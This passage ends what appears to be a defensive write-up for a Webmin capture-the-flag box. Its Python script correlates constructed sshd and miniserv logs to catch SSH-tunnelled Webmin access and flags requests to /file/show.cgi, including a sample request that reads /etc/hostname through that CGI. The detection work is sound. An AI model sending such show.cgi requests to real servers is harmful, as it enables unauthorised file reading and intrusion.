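Jan 31 22:58:03 gamezone sshd[1201]: pam_unix(sshd:session): session opened for user agent47 by (uid=0)
Jan 31 23:10:40 gamezone sshd[1201]: pam_unix(sshd:session): session closed for user agent47
"""

# Constructed sample data: Webmin access lines; the layout (CLF with the Webmin
# username as third field) is an assumption to verify against a real miniserv.log.
MINISERV_LOG = """\
127.0.0.1 - agent47 [31/Jan/2024:23:03:10 +0000] "GET / HTTP/1.1" 200 8123
127.0.0.1 - agent47 [31/Jan/2024:23:05:51 +0000] "GET /file/show.cgi/etc/hostname HTTP/1.1" 200 0
10.10.239.42 - agent47 [31/Jan/2024:23:20:00 +0000] "GET /updown/ HTTP/1.1" 200 2201
"""

SSH_ACCEPT = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[(\d+)\]: Accepted \w+ for (\S+) from (\S+)")
SSH_CLOSE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[(\d+)\]: .*session closed for user (\S+)")
WEBMIN_REQ = re.compile(
    r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

SYSLOG_YEAR = 2024            # assumption: syslog timestamps carry no year
LOOPBACK = {"127.0.0.1", "::1"}


def parse_syslog_ts(text):
    """'Jan 31 22:58:03' -> aware UTC datetime (year assumed)."""
    return datetime.strptime(f"{SYSLOG_YEAR} {text}", "%Y %b %d %H:%M:%S").replace(tzinfo=timezone.utc)


def parse_clf_ts(text):
    """'31/Jan/2024:23:03:10 +0000' -> aware datetime."""
    return datetime.strptime(text, "%d/%b/%Y:%H:%M:%S %z")


def ssh_sessions(auth_log):
    """Pair 'Accepted ... for USER' with 'session closed for user USER' by sshd PID.
    Returns dicts with user, src, start and end (end is None if still open)."""
    open_by_pid, sessions = {}, []
    for line in auth_log.splitlines():
        m = SSH_ACCEPT.match(line)
        if m:
            ts, pid, user, src = m.groups()
            open_by_pid[pid] = {"user": user, "src": src,
                                "start": parse_syslog_ts(ts), "end": None}
            continue
        m = SSH_CLOSE.match(line)
        if m:
            ts, pid, _user = m.groups()
            sess = open_by_pid.pop(pid, None)
            if sess:
                sess["end"] = parse_syslog_ts(ts)
                sessions.append(sess)
    sessions.extend(open_by_pid.values())   # sessions still open at end of log
    return sessions


def find_tunnelled_webmin_access(auth_log, miniserv_log):
    """Return (kind, user, source, path) findings:
    - 'show_cgi_request'           any request to /file/show.cgi
    - 'loopback_webmin_during_ssh' loopback request while that user has SSH open;
      source is the SSH client address, i.e. the real origin behind the tunnel."""
    sessions = ssh_sessions(auth_log)
    findings = []
    for line in miniserv_log.splitlines():
        m = WEBMIN_REQ.match(line)
        if not m:
            continue
        src, user, ts, _method, path, _status = m.groups()
        when = parse_clf_ts(ts)
        if path.startswith("/file/show.cgi"):
            findings.append(("show_cgi_request", user, src, path))
        if src in LOOPBACK:
            for s in sessions:
                if s["user"] == user and s["start"] <= when and (s["end"] is None or when <= s["end"]):
                    findings.append(("loopback_webmin_during_ssh", user, s["src"], path))
                    break
    return findings


if __name__ == "__main__":
    for f in find_tunnelled_webmin_access(AUTH_LOG, MINISERV_LOG):
        print(f)
```

On the constructed sample the script reports three findings: the two loopback requests made during agent47's SSH session (attributed back to 10.10.239.42, the SSH client) and the show.cgi request, while the later direct request from 10.10.239.42 is not flagged. Binding Webmin to localhost hides it from port scans but, as the writeup shows, not from anyone who already holds SSH credentials, so the loopback-plus-SSH correlation is the signal worth alerting on, alongside keeping Webmin patched.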
/////////////////END//////////////////